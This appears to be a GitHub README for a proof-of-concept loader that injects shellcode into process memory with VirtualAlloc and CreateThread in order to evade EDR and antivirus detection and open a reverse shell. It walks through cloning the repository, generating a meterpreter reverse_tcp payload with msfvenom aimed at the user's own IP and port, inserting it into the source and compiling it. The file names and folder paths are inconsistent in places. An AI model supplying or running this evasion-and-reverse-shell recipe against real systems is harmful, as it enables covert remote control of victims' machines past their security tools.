This repository contains a proof-of-concept (PoC) for bypassing EDR and antivirus solutions using a memory injection technique.
The code executes shellcode that spawns a reverse shell, successfully evading detection by various security mechanisms.
This project demonstrates how to bypass EDR and antivirus protection using Windows API functions such as VirtualAlloc, CreateThread, and WaitForSingleObject. The payload is injected directly into the process memory without being detected by security tools, establishing a connection to a remote system for a reverse shell.
Uses VirtualAlloc and CreateThread to inject the payload directly into process memory.
git clone https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access
Before compiling, ensure that you modify the shellcode to point to your own IP address and port for the reverse shell. You can generate shellcode using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp
Replace the byte[] buf section in Program.cs with the shellcode you just generated.
Open the project in Visual Studio, or use the following command to compile the code using the .NET SDK:
csc loader.cs
Alternatively, you can compile in Release mode for better optimization:
csc -optimize loader.cs